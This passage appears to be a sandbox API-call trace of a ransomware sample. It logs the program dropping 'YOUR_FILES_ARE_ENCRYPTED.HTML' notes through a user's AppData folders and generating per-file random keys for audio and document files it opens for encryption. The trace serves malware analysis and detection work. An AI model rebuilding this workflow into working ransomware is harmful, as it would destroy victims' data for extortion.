ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0x0, dwReserved1=0x60, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 0 [0164.807] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0164.807] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0164.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\internet explorer\\services\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0164.808] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0164.810] CloseHandle (hObject=0x5b8) returned 1 [0164.811] GetProcessHeap () returned 0x270000 [0164.811] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0164.812] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee9dd60, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Services", cAlternateFileName="")) returned 0 [0164.812] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.812] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0164.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0164.812] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.815] CloseHandle (hObject=0x5e4) returned 1 [0164.815] GetProcessHeap () returned 0x270000 [0164.816] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0164.816] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee77c00, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaee9dd60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee9dd60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0164.816] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0164.817] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0164.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0164.820] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0164.822] CloseHandle (hObject=0x598) returned 1 [0164.823] GetProcessHeap () returned 0x270000 [0164.823] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.823] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xaee77c00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee77c00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0164.824] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0164.824] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0164.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0164.829] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0164.832] CloseHandle (hObject=0x5a4) returned 1 [0164.833] GetProcessHeap () returned 0x270000 [0164.833] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0164.839] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf6f2a60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf6f2a60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="")) returned 1 [0164.839] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming") returned 39 [0164.839] GetProcessHeap () returned 0x270000 [0164.839] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0164.841] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming" [0164.841] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\*" [0164.841] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf6f2a60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf6f2a60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0164.841] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf6f2a60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf6f2a60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.842] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54e693f0, ftCreationTime.dwHighDateTime=0x1d7dbe5, ftLastAccessTime.dwLowDateTime=0x7a56efe0, ftLastAccessTime.dwHighDateTime=0x1d7dbf4, ftLastWriteTime.dwLowDateTime=0x7a56efe0, ftLastWriteTime.dwHighDateTime=0x1d7dbf4, nFileSizeHigh=0x0, nFileSizeLow=0xb393, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="-MDlQjdBDlw2Y.m4a", cAlternateFileName="-MDLQJ~1.M4A")) returned 1 [0164.842] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a") returned 57 [0164.842] lstrcmpW (lpString1="-MDlQjdBDlw2Y.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.842] PathFindExtensionW (pszPath="-MDlQjdBDlw2Y.m4a") returned=".m4a" [0164.842] lstrlenW (lpString=".m4a") returned 4 [0164.842] PathFindExtensionW (pszPath="-MDlQjdBDlw2Y.m4a") returned=".m4a" [0164.842] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\-mdlqjdbdlw2y.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.843] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=45971) returned 1 [0164.843] GetProcessHeap () returned 0x270000 [0164.843] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.847] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="7C") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D5") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="FF") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="3C") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="58") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="ED") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="8A") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="65") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="5B") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="80") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="F1") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="CE") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="9D") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="7D") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1C") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="7A") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="AA") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="87") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="00") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="A4") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="76") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="61") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="8B") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="84") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="BF") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9A") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="73") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="0D") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="AD") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="97") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="78") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="6C") returned 2 [0164.850] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a" [0164.850] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.850] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.850] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99d783c0, ftCreationTime.dwHighDateTime=0x1d7e081, ftLastAccessTime.dwLowDateTime=0xa8c58570, ftLastAccessTime.dwHighDateTime=0x1d7e0d2, ftLastWriteTime.dwLowDateTime=0xa8c58570, ftLastWriteTime.dwHighDateTime=0x1d7e0d2, nFileSizeHigh=0x0, nFileSizeLow=0x1316f, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="3lBzAWDiAW5xAw.docx", cAlternateFileName="3LBZAW~1.DOC")) returned 1 [0164.850] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx") returned 59 [0164.850] lstrcmpW (lpString1="3lBzAWDiAW5xAw.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.850] PathFindExtensionW (pszPath="3lBzAWDiAW5xAw.docx") returned=".docx" [0164.850] lstrlenW (lpString=".docx") returned 5 [0164.850] PathFindExtensionW (pszPath="3lBzAWDiAW5xAw.docx") returned=".docx" [0164.850] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.850] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\3lbzawdiaw5xaw.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.864] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=78191) returned 1 [0164.864] GetProcessHeap () returned 0x270000 [0164.867] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.868] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="B9") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="62") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="EC") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="C4") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="0E") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="92") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="BC") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="2E") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="1E") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="11") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="84") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1F") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="F2") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="66") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="9A") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="2F") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E9") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="4D") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="6D") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="03") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B0") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="D6") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="CB") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="9A") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="AE") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9A") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="B8") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E9") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="00") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="01") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E5") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="32") returned 2 [0164.870] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx" [0164.870] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.870] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.880] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fcde60, ftCreationTime.dwHighDateTime=0x1d7dabb, ftLastAccessTime.dwLowDateTime=0x8b71df30, ftLastAccessTime.dwHighDateTime=0x1d7e502, ftLastWriteTime.dwLowDateTime=0x8b71df30, ftLastWriteTime.dwHighDateTime=0x1d7e502, nFileSizeHigh=0x0, nFileSizeLow=0x117b1, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="4r9qEg53tKJmZlc.mp3", cAlternateFileName="4R9QEG~1.MP3")) returned 1 [0164.881] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3") returned 59 [0164.881] lstrcmpW (lpString1="4r9qEg53tKJmZlc.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.881] PathFindExtensionW (pszPath="4r9qEg53tKJmZlc.mp3") returned=".mp3" [0164.881] lstrlenW (lpString=".mp3") returned 4 [0164.881] PathFindExtensionW (pszPath="4r9qEg53tKJmZlc.mp3") returned=".mp3" [0164.881] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\4r9qeg53tkjmzlc.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.881] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=71601) returned 1 [0164.881] GetProcessHeap () returned 0x270000 [0164.882] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.882] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="B2") returned 2 [0164.882] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="72") returned 2 [0164.882] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="3C") returned 2 [0164.882] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F9") returned 2 [0164.882] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="88") returned 2 [0164.882] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="99") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="FC") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="98") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DF") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1D") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="D5") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D8") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D0") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="96") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="3C") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="55") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3B") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="33") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="7A") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="8F") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="F4") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="CA") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="28") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="DD") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="38") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="BD") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="1B") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="FA") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D1") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="BA") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E6") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7B") returned 2 [0164.884] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3" [0164.884] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.884] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.897] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8dbaf8b0, ftCreationTime.dwHighDateTime=0x1d7e0cc, ftLastAccessTime.dwLowDateTime=0x835594e0, ftLastAccessTime.dwHighDateTime=0x1d7e638, ftLastWriteTime.dwLowDateTime=0x835594e0, 